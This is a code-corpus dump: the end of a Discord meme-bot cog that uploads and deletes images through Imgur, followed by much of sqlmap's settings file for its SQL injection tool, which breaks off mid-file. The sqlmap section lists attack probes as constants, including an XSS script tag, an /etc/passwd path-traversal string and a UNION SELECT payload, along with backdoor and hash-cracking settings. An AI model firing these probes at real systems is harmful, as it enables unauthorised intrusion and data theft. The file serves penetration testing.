await self.bot.say(mmm[:-2])
@commands.command(pass_context=True)
async def cleanmemes(self, ctx):
"""
Cleans memes
"""
tag_changes = []
for meme in self.memes:
assert isinstance(meme, dict)
final_tags = [self.normalize(i) for i in meme['tags']]
for tag1 in final_tags[:]:
one_skip = True
for tag2 in final_tags[:]:
if tag1 == tag2:
if one_skip:
one_skip = False
continue
if tag1 in tag2:
final_tags.remove(tag1)
break
index = self.memes.index(meme)
if len(final_tags) != len(meme['tags']):
tag_changes.append("``{} -> {}``".format(" ".join(meme['tags']), " ".join(final_tags)))
self.memes[index]['tags'] = final_tags
if tag_changes:
self.save_memes()
mmm = self.bot.msg_prefix + "Here are the memes I changed:\n"
for change in tag_changes:
next_m = change + ", "
if len(mmm + next_m) < 2000:
mmm += next_m
else:
await self.bot.say(mmm[:-2])
mmm = self.bot.msg_prefix + next_m
await self.bot.say(mmm[:-2])
else:
await self.bot.say(self.bot.msg_prefix + "All memes are already clean")
    @commands.command(pass_context=True, aliases=['listinstants'])
async def listinstantmemes(self, ctx):
"""
Lists all memes that have some instants
"""
ll = list()
for meme in self.memes:
assert isinstance(meme, dict)
if meme.get('instants', list()):
ll.append("``{} -> {}``".format(", ".join(meme['instants']), " ".join(meme['tags'])))
if ll:
mmm = self.bot.msg_prefix
for l in ll:
next_m = l + ", "
if len(mmm + next_m) < 2000:
mmm += next_m
else:
await self.bot.say(mmm[:-2])
mmm = self.bot.msg_prefix + next_m
await self.bot.say(mmm[:-2])
@commands.group(pass_context=True)
async def lastmeme(self, ctx):
"""
Does stuff to last meme
"""
if ctx.invoked_subcommand is None: # TIL I could just use `invoke_without_command=True` in deco
if not self._last_meme:
await self.bot.say(self.bot.msg_prefix + "You haven't used meme since last restart.")
return
await self.bot.say(self.bot.msg_prefix + "Last meme is: ``{}``".format(" ".join(self._last_meme['tags'])))
@lastmeme.command(pass_context=True, aliases=['show','view'])
async def display(self, ctx):
"""
Displays the meme
"""
if ctx.message.author.permissions_in(ctx.message.channel).embed_links:
em = discord.Embed()
em.set_image(url=self._last_meme['link'])
await self.bot.send_message(ctx.message.channel, embed=em)
else:
await self.bot.say(self.bot.msg_prefix + self._last_meme['link'])
await asyncio.sleep(5)
await self.bot.delete_message(ctx.message)
@lastmeme.command(pass_context=True, aliases=['switch'])
async def change(self, ctx, url: str = ""):
"""
Changes the last meme to the uploaded image
"""
tags = self._last_meme['tags']
if not (len(ctx.message.attachments) > 0 or url):
            await self.bot.say(self.bot.msg_prefix + "You didn't include an image...")
return
await self.bot.say(self.bot.msg_prefix + "Deleting then uploading new one")
self.memes.remove(self._last_meme)
async with aiohttp.ClientSession() as session:
async with session.delete(self.IMGUR_API_LINK + "/{}".format(self._last_meme['delete_hash']),
headers={"Authorization": "Client-ID {}".format(
self.config['imgur_client_id'])}) as response:
response_json = json.loads(await response.text())
if response_json['success']:
await self.bot.say(self.bot.msg_prefix + "Successfully deleted")
else:
await self.bot.say(
self.bot.msg_prefix + "Local pointer deleted, imgur refused to delete...")
if len(ctx.message.attachments) > 0:
url = ctx.message.attachments[0]['url']
async with aiohttp.ClientSession() as session:
async with session.post(self.IMGUR_API_LINK,
data={'image': url, 'type': "URL"},
headers={"Authorization": "Client-ID {}".format(
self.config['imgur_client_id'])}) as response:
response_json = json.loads(await response.text())
info = {'tags': tags,
'delete_hash': response_json['data']['deletehash'],
'width': response_json['data']['width'],
'height': response_json['data']['height'],
'id': response_json['data']['id'],
'link': response_json['data']['link']}
self.memes.append(info)
self.save_memes()
self._last_meme = info
to_del = await self.bot.say(self.bot.msg_prefix + "\U0001f44d")
await asyncio.sleep(5)
await self.bot.delete_message(to_del)
await self.bot.delete_message(ctx.message)
@lastmeme.command(pass_context=True, aliases=['addtags'])
async def addtag(self, ctx, *, tags: str):
"""
Adds tag to last meme
"""
if not self._last_meme:
await self.bot.say(self.bot.msg_prefix + "You haven't used meme since last restart.")
return
index = self.memes.index(self._last_meme)
for tag in tags.split():
self._last_meme['tags'].append(tag)
self.memes[index] = self._last_meme
self.save_memes()
await self.bot.say(self.bot.msg_prefix + "Added")
@lastmeme.command(pass_context=True, aliases=['removetags'])
async def removetag(self, ctx, *, tags: str):
"""
Removes tag from last meme
"""
if not self._last_meme:
await self.bot.say(self.bot.msg_prefix + "You haven't used meme since last restart.")
return
index = self.memes.index(self._last_meme)
for s_tag in tags.split():
for m_tag in self._last_meme['tags'][:]:
if m_tag in s_tag:
try:
self._last_meme['tags'].remove(m_tag)
except ValueError:
pass
self.memes[index] = self._last_meme
self.save_memes()
await self.bot.say(self.bot.msg_prefix + "Removed")
@lastmeme.command(pass_context=True)
async def addinstant(self, ctx, instant: str):
"""
Adds instant access to last meme
"""
index = self.memes.index(self._last_meme)
for s in instant.split():
if self.has_instants(s):
await self.bot.say(self.bot.msg_prefix + "Instant ``{}`` already in use.".format(s))
else:
self._last_meme.setdefault('instants', list()).append(s)
await self.bot.say(self.bot.msg_prefix + "Added")
self.memes[index] = self._last_meme
self.save_memes()
@lastmeme.command(pass_context=True, aliases=["delete"])
async def remove(self, ctx):
"""
Removes the lastmeme
"""
meme = self._last_meme
self.memes.remove(meme)
async with aiohttp.ClientSession() as session:
async with session.delete(self.IMGUR_API_LINK + "/{}".format(meme['delete_hash']),
headers={"Authorization": "Client-ID {}".format(
self.config['imgur_client_id'])}) as response:
response_json = json.loads(await response.text())
if response_json['success']:
await self.bot.say(self.bot.msg_prefix + "Successfully deleted")
else:
await self.bot.say(self.bot.msg_prefix + "Local pointer deleted, imgur refused to delete...")
self.save_memes()
def setup(bot: commands.Bot):
bot.add_cog(Memes(bot))
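The matching at the heart of `find_best_meme` above — every normalized search tag must occur as a substring of at least one of a meme's tags — can be isolated as a small sketch (`matches` is an illustrative name, not part of the cog):

```python
def matches(search_tags, meme_tags):
    """Core rule from find_best_meme: every search tag must be a substring
    of at least one of the meme's tags for the meme to be kept."""
    return all(any(s_tag in m_tag for m_tag in meme_tags)
               for s_tag in search_tags)
```

A meme tagged `['catmeme', 'funny']` therefore matches a search for `cat` but not for `cat dog`.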
| mit |
golismero/golismero-devel | tools/sqlmap/lib/core/settings.py | 7 | 25124 | #!/usr/bin/env python
"""
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import os
import re
import subprocess
import string
import sys
from lib.core.enums import DBMS
from lib.core.enums import DBMS_DIRECTORY_NAME
from lib.core.enums import OS
from lib.core.revision import getRevisionNumber
# sqlmap version and site
VERSION = "1.0-dev"
REVISION = getRevisionNumber()
VERSION_STRING = "sqlmap/%s%s" % (VERSION, "-%s" % REVISION if REVISION else "")
DESCRIPTION = "automatic SQL injection and database takeover tool"
SITE = "http://sqlmap.org"
ISSUES_PAGE = "https://github.com/sqlmapproject/sqlmap/issues/new"
GIT_REPOSITORY = "git://github.com/sqlmapproject/sqlmap.git"
ML = "sqlmap-users@lists.sourceforge.net"
# Minimum distance of ratio from kb.matchRatio to result in True
DIFF_TOLERANCE = 0.05
CONSTANT_RATIO = 0.9
# Lower and upper values for match ratio in case of stable page
LOWER_RATIO_BOUND = 0.02
UPPER_RATIO_BOUND = 0.98
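These constants apply to a difflib-style similarity ratio between a baseline page and the page returned for an injected request. A hedged sketch of one plausible tolerance test — sqlmap's real comparison logic lives in its request layer and is more involved:

```python
import difflib

LOWER_RATIO_BOUND = 0.02
UPPER_RATIO_BOUND = 0.98
DIFF_TOLERANCE = 0.05

def pages_match(original, current, match_ratio):
    """Illustrative check: treat pages as matching when the (clamped)
    similarity ratio lands within DIFF_TOLERANCE of the learned match_ratio."""
    ratio = difflib.SequenceMatcher(None, original, current).ratio()
    ratio = min(max(ratio, LOWER_RATIO_BOUND), UPPER_RATIO_BOUND)
    return abs(ratio - match_ratio) <= DIFF_TOLERANCE
```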
# Markers for special cases when parameter values contain html encoded characters
PARAMETER_AMP_MARKER = "__AMP__"
PARAMETER_SEMICOLON_MARKER = "__SEMICOLON__"
PARTIAL_VALUE_MARKER = "__PARTIAL_VALUE__"
PARTIAL_HEX_VALUE_MARKER = "__PARTIAL_HEX_VALUE__"
URI_QUESTION_MARKER = "__QUESTION_MARK__"
ASTERISK_MARKER = "__ASTERISK_MARK__"
REPLACEMENT_MARKER = "__REPLACEMENT_MARK__"
PAYLOAD_DELIMITER = "__PAYLOAD_DELIMITER__"
CHAR_INFERENCE_MARK = "%c"
PRINTABLE_CHAR_REGEX = r"[^\x00-\x1f\x7f-\xff]"
# Regular expression used for recognition of generic permission messages
PERMISSION_DENIED_REGEX = r"(command|permission|access)\s*(was|is)?\s*denied"
# Regular expression used for recognition of generic maximum connection messages
MAX_CONNECTIONS_REGEX = r"max.+connections"
# Regular expression used for extracting results from google search
GOOGLE_REGEX = r"url\?\w+=((?![^>]+webcache\.googleusercontent\.com)http[^>]+)&(sa=U|rct=j)"
# Regular expression used for extracting content from "textual" tags
TEXT_TAG_REGEX = r"(?si)<(abbr|acronym|b|blockquote|br|center|cite|code|dt|em|font|h\d|i|li|p|pre|q|strong|sub|sup|td|th|title|tt|u)(?!\w).*?>(?P<result>[^<]+)"
# Regular expression used for recognition of IP addresses
IP_ADDRESS_REGEX = r"\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b"
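The recognition patterns above are ordinary `re` patterns; for instance, the IP pattern can be exercised directly. Note that it does not validate octet ranges, so a string like `999.999.999.999` would also match:

```python
import re

IP_ADDRESS_REGEX = r"\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b"

# Pull every dotted-quad out of a free-form string.
found = re.findall(IP_ADDRESS_REGEX, "host 10.0.0.1 proxied via 192.168.1.254")
```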
# Dumping characters used in GROUP_CONCAT MySQL technique
CONCAT_ROW_DELIMITER = ','
CONCAT_VALUE_DELIMITER = '|'
# Coefficient used for a time-based query delay checking (must be >= 7)
TIME_STDEV_COEFF = 7
# Minimum response time that can be even considered as delayed (not a complete requirement)
MIN_VALID_DELAYED_RESPONSE = 0.5
# Standard deviation after which a warning message should be displayed about connection lags
WARN_TIME_STDEV = 0.5
# Minimum length of usable union injected response (quick defense against substr fields)
UNION_MIN_RESPONSE_CHARS = 10
# Coefficient used for a union-based number of columns checking (must be >= 7)
UNION_STDEV_COEFF = 7
# Length of queue for candidates for time delay adjustment
TIME_DELAY_CANDIDATES = 3
# Default value for HTTP Accept header
HTTP_ACCEPT_HEADER_VALUE = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
# Default value for HTTP Accept-Encoding header
HTTP_ACCEPT_ENCODING_HEADER_VALUE = "gzip,deflate"
# Default timeout for running commands over backdoor
BACKDOOR_RUN_CMD_TIMEOUT = 5
# Maximum number of techniques used in inject.py/getValue() per one value
MAX_TECHNIQUES_PER_VALUE = 2
# Suffix used for naming meta databases in DBMS(es) without explicit database name
METADB_SUFFIX = "_masterdb"
# Minimum time response set needed for time-comparison based on standard deviation
MIN_TIME_RESPONSES = 15
# Minimum comparison ratio set needed for searching valid union column number based on standard deviation
MIN_UNION_RESPONSES = 5
# After this number of blanks at the end, inference should stop (just in case)
INFERENCE_BLANK_BREAK = 10
# Use this replacement character for cases when inference is not able to retrieve the proper character value
INFERENCE_UNKNOWN_CHAR = '?'
# Character used for operation "greater" in inference
INFERENCE_GREATER_CHAR = ">"
# Character used for operation "equals" in inference
INFERENCE_EQUALS_CHAR = "="
# Character used for operation "not-equals" in inference
INFERENCE_NOT_EQUALS_CHAR = "!="
# String used for representation of unknown dbms
UNKNOWN_DBMS = "Unknown"
# String used for representation of unknown dbms version
UNKNOWN_DBMS_VERSION = "Unknown"
# Dynamicity mark length used in dynamicity removal engine
DYNAMICITY_MARK_LENGTH = 32
# Dummy user prefix used in dictionary attack
DUMMY_USER_PREFIX = "__dummy__"
# Reference: http://en.wikipedia.org/wiki/ISO/IEC_8859-1
DEFAULT_PAGE_ENCODING = "iso-8859-1"
# URL used in dummy runs
DUMMY_URL = "http://foo/bar?id=1"
# System variables
IS_WIN = subprocess.mswindows
# The name of the operating system dependent module imported. The following names have currently been registered: 'posix', 'nt', 'mac', 'os2', 'ce', 'java', 'riscos'
PLATFORM = os.name
PYVERSION = sys.version.split()[0]
# DBMS system databases
MSSQL_SYSTEM_DBS = ("Northwind", "master", "model", "msdb", "pubs", "tempdb")
MYSQL_SYSTEM_DBS = ("information_schema", "mysql") # Before MySQL 5.0 only "mysql"
PGSQL_SYSTEM_DBS = ("information_schema", "pg_catalog", "pg_toast")
ORACLE_SYSTEM_DBS = ("CTXSYS", "DBSNMP", "DMSYS", "EXFSYS", "MDSYS", "OLAPSYS", "ORDSYS", "OUTLN", "SYS", "SYSAUX", "SYSMAN", "SYSTEM", "TSMSYS", "WMSYS", "XDB") # These are TABLESPACE_NAME
SQLITE_SYSTEM_DBS = ("sqlite_master", "sqlite_temp_master")
ACCESS_SYSTEM_DBS = ("MSysAccessObjects", "MSysACEs", "MSysObjects", "MSysQueries", "MSysRelationships", "MSysAccessStorage",\
"MSysAccessXML", "MSysModules", "MSysModules2")
FIREBIRD_SYSTEM_DBS = ("RDB$BACKUP_HISTORY", "RDB$CHARACTER_SETS", "RDB$CHECK_CONSTRAINTS", "RDB$COLLATIONS", "RDB$DATABASE",\
"RDB$DEPENDENCIES", "RDB$EXCEPTIONS", "RDB$FIELDS", "RDB$FIELD_DIMENSIONS", " RDB$FILES", "RDB$FILTERS",\
"RDB$FORMATS", "RDB$FUNCTIONS", "RDB$FUNCTION_ARGUMENTS", "RDB$GENERATORS", "RDB$INDEX_SEGMENTS", "RDB$INDICES",\
"RDB$LOG_FILES", "RDB$PAGES", "RDB$PROCEDURES", "RDB$PROCEDURE_PARAMETERS", "RDB$REF_CONSTRAINTS", "RDB$RELATIONS",\
"RDB$RELATION_CONSTRAINTS", "RDB$RELATION_FIELDS", "RDB$ROLES", "RDB$SECURITY_CLASSES", "RDB$TRANSACTIONS", "RDB$TRIGGERS",\
"RDB$TRIGGER_MESSAGES", "RDB$TYPES", "RDB$USER_PRIVILEGES", "RDB$VIEW_RELATIONS")
MAXDB_SYSTEM_DBS = ("SYSINFO", "DOMAIN")
SYBASE_SYSTEM_DBS = ("master", "model", "sybsystemdb", "sybsystemprocs")
DB2_SYSTEM_DBS = ("NULLID", "SQLJ", "SYSCAT", "SYSFUN", "SYSIBM", "SYSIBMADM", "SYSIBMINTERNAL", "SYSIBMTS",\
"SYSPROC", "SYSPUBLIC", "SYSSTAT", "SYSTOOLS")
HSQLDB_SYSTEM_DBS = ("INFORMATION_SCHEMA", "SYSTEM_LOB")
MSSQL_ALIASES = ("microsoft sql server", "mssqlserver", "mssql", "ms")
MYSQL_ALIASES = ("mysql", "my")
PGSQL_ALIASES = ("postgresql", "postgres", "pgsql", "psql", "pg")
ORACLE_ALIASES = ("oracle", "orcl", "ora", "or")
SQLITE_ALIASES = ("sqlite", "sqlite3")
ACCESS_ALIASES = ("msaccess", "access", "jet", "microsoft access")
FIREBIRD_ALIASES = ("firebird", "mozilla firebird", "interbase", "ibase", "fb")
MAXDB_ALIASES = ("maxdb", "sap maxdb", "sap db")
SYBASE_ALIASES = ("sybase", "sybase sql server")
DB2_ALIASES = ("db2", "ibm db2", "ibmdb2")
HSQLDB_ALIASES = ("hsql", "hsqldb", "hs", "hypersql")
DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) for _ in dir(DBMS) if not _.startswith("_"))
SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES
SUPPORTED_OS = ("linux", "windows")
USER_AGENT_ALIASES = ("ua", "useragent", "user-agent")
REFERER_ALIASES = ("ref", "referer", "referrer")
HOST_ALIASES = ("host",)
# Items displayed in basic help (-h) output
BASIC_HELP_ITEMS = (
"url",
"googleDork",
"data",
"cookie",
"randomAgent",
"proxy",
"testParameter",
"dbms",
"level",
"risk",
"tech",
"getAll",
"getBanner",
"getCurrentUser",
"getCurrentDb",
"getPasswordHashes",
"getTables",
"getColumns",
"getSchema",
"dumpTable",
"dumpAll",
"db",
"tbl",
"col",
"osShell",
"osPwn",
"batch",
"checkTor",
"flushSession",
"tor",
"wizard",
)
# String representation for NULL value
NULL = "NULL"
# String representation for blank ('') value
BLANK = "<blank>"
# String representation for current database
CURRENT_DB = "CD"
# Regular expressions used for parsing error messages (--parse-errors)
ERROR_PARSING_REGEXES = (
r"<b>[^<]*(fatal|error|warning|exception)[^<]*</b>:?\s*(?P<result>.+?)<br\s*/?\s*>",
r"(?m)^(fatal|error|warning|exception):?\s*(?P<result>.+?)$",
r"<li>Error Type:<br>(?P<result>.+?)</li>",
r"error '[0-9a-f]{8}'((<[^>]+>)|\s)+(?P<result>[^<>]+)",
)
# Regular expression used for parsing charset info from meta html headers
META_CHARSET_REGEX = r'(?si)<head>.*<meta http-equiv="?content-type"?[^>]+charset=(?P<result>[^">]+).*</head>'
# Regular expression used for parsing refresh info from meta html headers
META_REFRESH_REGEX = r'(?si)<head>.*<meta http-equiv="?refresh"?[^>]+content="?[^">]+url=(?P<result>[^">]+).*</head>'
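For illustration only (not part of sqlmap; the sample HTML is made up): extracting charset info with `META_CHARSET_REGEX` above.

```python
# Illustrative sketch: extracting the page charset with META_CHARSET_REGEX.
import re

META_CHARSET_REGEX = r'(?si)<head>.*<meta http-equiv="?content-type"?[^>]+charset=(?P<result>[^">]+).*</head>'

html = '<head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"></head>'
match = re.search(META_CHARSET_REGEX, html)
assert match and match.group("result") == "iso-8859-2"
```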
# Regular expression used for parsing empty fields in tested form data
EMPTY_FORM_FIELDS_REGEX = r'(&|\A)(?P<result>[^=]+=(&|\Z))'
# Reference: http://www.cs.ru.nl/bachelorscripties/2010/Martin_Devillers___0437999___Analyzing_password_strength.pdf
COMMON_PASSWORD_SUFFIXES = ("1", "123", "2", "12", "3", "13", "7", "11", "5", "22", "23", "01", "4", "07", "21", "14", "10", "06", "08", "8", "15", "69", "16", "6", "18")
# Reference: http://www.the-interweb.com/serendipity/index.php?/archives/94-A-brief-analysis-of-40,000-leaked-MySpace-passwords.html
COMMON_PASSWORD_SUFFIXES += ("!", ".", "*", "!!", "?", ";", "..", "!!!", ", ", "@")
# Splitter used between requests in WebScarab log files
WEBSCARAB_SPLITTER = "### Conversation"
# Regex used for splitting requests in Burp log files
BURP_REQUEST_REGEX = r"={10,}\s+[^=]+={10,}\s(.+?)\s={10,}"
# Regex used for parsing XML Burp saved history items
BURP_XML_HISTORY_REGEX = r'<request base64="true"><!\[CDATA\[([^]]+)'
# Encoding used for Unicode data
UNICODE_ENCODING = "utf8"
# Reference: http://www.w3.org/Protocols/HTTP/Object_Headers.html#uri
URI_HTTP_HEADER = "URI"
# Uri format which could be injectable (e.g. www.site.com/id82)
URI_INJECTABLE_REGEX = r"//[^/]*/([^\.*?]+)\Z"
# Regex used for masking sensitive data
SENSITIVE_DATA_REGEX = r"(\s|=)(?P<result>[^\s=]*%s[^\s]*)\s"
# Maximum number of threads (avoiding connection issues and/or DoS)
MAX_NUMBER_OF_THREADS = 10
# Minimum range between minimum and maximum of statistical set
MIN_STATISTICAL_RANGE = 0.01
# Minimum value for comparison ratio
MIN_RATIO = 0.0
# Maximum value for comparison ratio
MAX_RATIO = 1.0
# Character used for marking injectable position inside provided data
CUSTOM_INJECTION_MARK_CHAR = '*'
# Other way to declare injection position
INJECT_HERE_MARK = '%INJECT HERE%'
# Maximum length used for retrieving data over MySQL error based payload due to "known" problems with longer result strings
MYSQL_ERROR_CHUNK_LENGTH = 50
# Maximum length used for retrieving data over MSSQL error based payload due to trimming problems with longer result strings
MSSQL_ERROR_CHUNK_LENGTH = 100
# Do not escape the injected statement if it contains any of the following SQL keywords
EXCLUDE_UNESCAPE = ("WAITFOR DELAY ", " INTO DUMPFILE ", " INTO OUTFILE ", "CREATE ", "BULK ", "EXEC ", "RECONFIGURE ", "DECLARE ", "'%s'" % CHAR_INFERENCE_MARK)
# Mark used for replacement of reflected values
REFLECTED_VALUE_MARKER = "__REFLECTED_VALUE__"
# Regular expression used for replacing border non-alphanum characters
REFLECTED_BORDER_REGEX = r"[^A-Za-z]+"
# Regular expression used for replacing non-alphanum characters
REFLECTED_REPLACEMENT_REGEX = r".+?"
# Maximum number of alpha-numerical parts in reflected regex (for speed purposes)
REFLECTED_MAX_REGEX_PARTS = 10
# Chars which can be used as failsafe values in case of too long URL encoded value
URLENCODE_FAILSAFE_CHARS = "()|,"
# Maximum length of URL encoded value after which failsafe procedure takes over
URLENCODE_CHAR_LIMIT = 2000
# Default schema for Microsoft SQL Server DBMS
DEFAULT_MSSQL_SCHEMA = "dbo"
# Display hash attack info every mod number of items
HASH_MOD_ITEM_DISPLAY = 11
# Maximum integer value
MAX_INT = sys.maxint
# Options that need to be restored in multiple targets run mode
RESTORE_MERGED_OPTIONS = ("col", "db", "dnsName", "privEsc", "tbl", "regexp", "string", "textOnly", "threads", "timeSec", "tmpPath", "uChar", "user")
# Parameters to be ignored in detection phase (upper case)
IGNORE_PARAMETERS = ("__VIEWSTATE", "__VIEWSTATEENCRYPTED", "__EVENTARGUMENT", "__EVENTTARGET", "__EVENTVALIDATION", "ASPSESSIONID", "ASP.NET_SESSIONID", "JSESSIONID", "CFID", "CFTOKEN")
# Regular expression used for recognition of ASP.NET control parameters
ASP_NET_CONTROL_REGEX = r"(?i)\Actl\d+\$"
# Turn off resume console info to avoid potential slowdowns
TURN_OFF_RESUME_INFO_LIMIT = 20
# Strftime format for results file used in multiple target mode
RESULTS_FILE_FORMAT = "results-%m%d%Y_%I%M%p.csv"
# Official web page with the list of Python supported codecs
CODECS_LIST_PAGE = "http://docs.python.org/library/codecs.html#standard-encodings"
# Simple regular expression used to distinguish scalar from multiple-row commands (not sole condition)
SQL_SCALAR_REGEX = r"\A(SELECT(?!\s+DISTINCT\(?))?\s*\w*\("
# IP address of the localhost
LOCALHOST = "127.0.0.1"
# Default port used by Tor
DEFAULT_TOR_SOCKS_PORT = 9050
# Default ports used in Tor proxy bundles
DEFAULT_TOR_HTTP_PORTS = (8123, 8118)
# Percentage below which comparison engine could have problems
LOW_TEXT_PERCENT = 20
# These MySQL keywords can't go (alone) into versioned comment form (/*!...*/)
# Reference: http://dev.mysql.com/doc/refman/5.1/en/function-resolution.html
IGNORE_SPACE_AFFECTED_KEYWORDS = ("CAST", "COUNT", "EXTRACT", "GROUP_CONCAT", "MAX", "MID", "MIN", "SESSION_USER", "SUBSTR", "SUBSTRING", "SUM", "SYSTEM_USER", "TRIM")
LEGAL_DISCLAIMER = "Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program"
# After this number of misses reflective removal mechanism is turned off (for speed up reasons)
REFLECTIVE_MISS_THRESHOLD = 20
# Regular expression used for extracting HTML title
HTML_TITLE_REGEX = r"<title>(?P<result>[^<]+)</title>"
# Table used for Base64 conversion in WordPress hash cracking routine
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
# Chars used to quickly distinguish if the user provided tainted parameter values
DUMMY_SQL_INJECTION_CHARS = ";()'"
# Simple check against dummy users
DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]|\bUNION\b.+\bSELECT\b"
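For illustration only (not part of sqlmap; the sample values are made up): how the two constants above can flag parameter values that already look tainted.

```python
# Illustrative sketch: flagging user-supplied values that already look
# like SQL injection payloads.
import re

DUMMY_SQL_INJECTION_CHARS = ";()'"
DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]|\bUNION\b.+\bSELECT\b"

value = "1' AND 1=1"
looks_tainted = any(c in value for c in DUMMY_SQL_INJECTION_CHARS) or \
    re.search(DUMMY_USER_INJECTION, value) is not None
assert looks_tainted
assert re.search(DUMMY_USER_INJECTION, "1 UNION ALL SELECT NULL")
```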
# Extensions skipped by crawler
CRAWL_EXCLUDE_EXTENSIONS = ("gif", "jpg", "jpeg", "image", "jar", "tif", "bmp", "war", "ear", "mpg", "mpeg", "wmv", "scm", "iso", "dmp", "dll", "cab", "so", "avi", "mkv", "bin", "tar", "png", "pdf", "ps", "wav", "mp3", "mp4", "au", "aiff", "aac", "zip", "rar", "7z", "gz", "flv", "mov")
# Patterns often seen in HTTP headers containing custom injection marking character
PROBLEMATIC_CUSTOM_INJECTION_PATTERNS = r"(\bq=[^;']+)|(\*/\*)"
# Template used for common table existence check
BRUTE_TABLE_EXISTS_TEMPLATE = "EXISTS(SELECT %d FROM %s)"
# Template used for common column existence check
BRUTE_COLUMN_EXISTS_TEMPLATE = "EXISTS(SELECT %s FROM %s)"
# Payload used for checking of existence of IDS/WAF (the dummier the better)
IDS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1"
# Vectors used for provoking specific WAF/IDS/IPS behavior(s)
WAF_ATTACK_VECTORS = (
"", # NIL
"search=<script>alert(1)</script>",
"file=../../../../etc/passwd",
"q=<invalid>foobar",
"id=1 %s" % IDS_WAF_CHECK_PAYLOAD
)
# Used for status representation in dictionary attack phase
ROTATING_CHARS = ('\\', '|', '|', '/', '-')
# Chunk length (in items) used by BigArray objects (only last chunk and cached one are held in memory)
BIGARRAY_CHUNK_LENGTH = 4096
# Only display the last n table rows in console output
TRIM_STDOUT_DUMP_SIZE = 256
# Parse response headers only for the first couple of responses
PARSE_HEADERS_LIMIT = 3
# Step used in ORDER BY technique used for finding the right number of columns in UNION query injections
ORDER_BY_STEP = 10
# Maximum number of times for revalidation of a character in time-based injections
MAX_TIME_REVALIDATION_STEPS = 5
# Characters that can be used to split parameter values in provided command line (e.g. in --tamper)
PARAMETER_SPLITTING_REGEX = r'[,|;]'
# Regular expression describing possible union char value (e.g. used in --union-char)
UNION_CHAR_REGEX = r'\A\w+\Z'
# Attribute used for storing original parameter value in special cases (e.g. POST)
UNENCODED_ORIGINAL_VALUE = 'original'
# Common column names containing usernames (used for hash cracking in some cases)
COMMON_USER_COLUMNS = ('user', 'username', 'user_name', 'benutzername', 'benutzer', 'utilisateur', 'usager', 'consommateur', 'utente', 'utilizzatore', 'usufrutuario', 'korisnik', 'usuario', 'consumidor')
# Default delimiter in GET/POST values
DEFAULT_GET_POST_DELIMITER = '&'
# Default delimiter in cookie values
DEFAULT_COOKIE_DELIMITER = ';'
# Unix timestamp used for forcing cookie expiration when provided with --load-cookies
FORCE_COOKIE_EXPIRATION_TIME = "9999999999"
# Skip unforced HashDB flush requests below the threshold number of cached items
HASHDB_FLUSH_THRESHOLD = 32
# Number of retries for unsuccessful HashDB flush attempts
HASHDB_FLUSH_RETRIES = 3
# Unique milestone value used for forced deprecation of old HashDB values (e.g. when changing hash/pickle mechanism)
HASHDB_MILESTONE_VALUE = "cAWxkLYCQT" # r5129 "".join(random.sample(string.ascii_letters, 10))
# Warn user of possible delay due to large page dump in full UNION query injections
LARGE_OUTPUT_THRESHOLD = 1024 ** 2
# On huge tables there is a considerable slowdown if every row retrieval requires ORDER BY (most noticeable in table dumping using ERROR injections)
SLOW_ORDER_COUNT_THRESHOLD = 10000
# Give up on hash recognition if nothing was found in first given number of rows
HASH_RECOGNITION_QUIT_THRESHOLD = 10000
# Maximum number of redirections to any single URL - this is needed because of the state that cookies introduce
MAX_SINGLE_URL_REDIRECTIONS = 4
# Maximum total number of redirections (regardless of URL) - before assuming we're in a loop
MAX_TOTAL_REDIRECTIONS = 10
# Reference: http://www.tcpipguide.com/free/t_DNSLabelsNamesandSyntaxRules.htm
MAX_DNS_LABEL = 63
# Alphabet used for prefix and suffix strings of name resolution requests in DNS technique (excluding hexadecimal chars to avoid mixing with inner content)
DNS_BOUNDARIES_ALPHABET = re.sub("[a-fA-F]", "", string.ascii_letters)
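For illustration only (not part of sqlmap): the expression above strips the twelve hex letters (a-f, A-F) from the ASCII alphabet, so boundary markers cannot be confused with hexadecimal payload content.

```python
# Illustrative sketch: what DNS_BOUNDARIES_ALPHABET evaluates to.
import re
import string

DNS_BOUNDARIES_ALPHABET = re.sub("[a-fA-F]", "", string.ascii_letters)

assert "a" not in DNS_BOUNDARIES_ALPHABET
assert "g" in DNS_BOUNDARIES_ALPHABET
assert len(DNS_BOUNDARIES_ALPHABET) == 52 - 12  # 6 lowercase + 6 uppercase removed
```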
# Alphabet used for heuristic checks
HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', '[', ']', ',', '.')
# Connection chunk size (processing large responses in chunks to avoid MemoryError crashes - e.g. large table dump in full UNION injections)
MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024
# Maximum response total page size (trimmed if larger)
MAX_CONNECTION_TOTAL_SIZE = 100 * 1024 * 1024
# Maximum (multi-threaded) length of entry in bisection algorithm
MAX_BISECTION_LENGTH = 50 * 1024 * 1024
# Mark used for trimming unnecessary content in large chunks
LARGE_CHUNK_TRIM_MARKER = "__TRIMMED_CONTENT__"
# Generic SQL comment formation
GENERIC_SQL_COMMENT = "-- "
# Threshold value for turning back on time auto-adjustment mechanism
VALID_TIME_CHARS_RUN_THRESHOLD = 100
# Check for empty columns only if table is sufficiently large
CHECK_ZERO_COLUMNS_THRESHOLD = 10
# Boldify all logger messages containing these "patterns"
BOLD_PATTERNS = ("' injectable", "might be injectable", "' is vulnerable", "is not injectable", "test failed", "test passed", "live test final result", "test shows that")
# Generic www root directory names
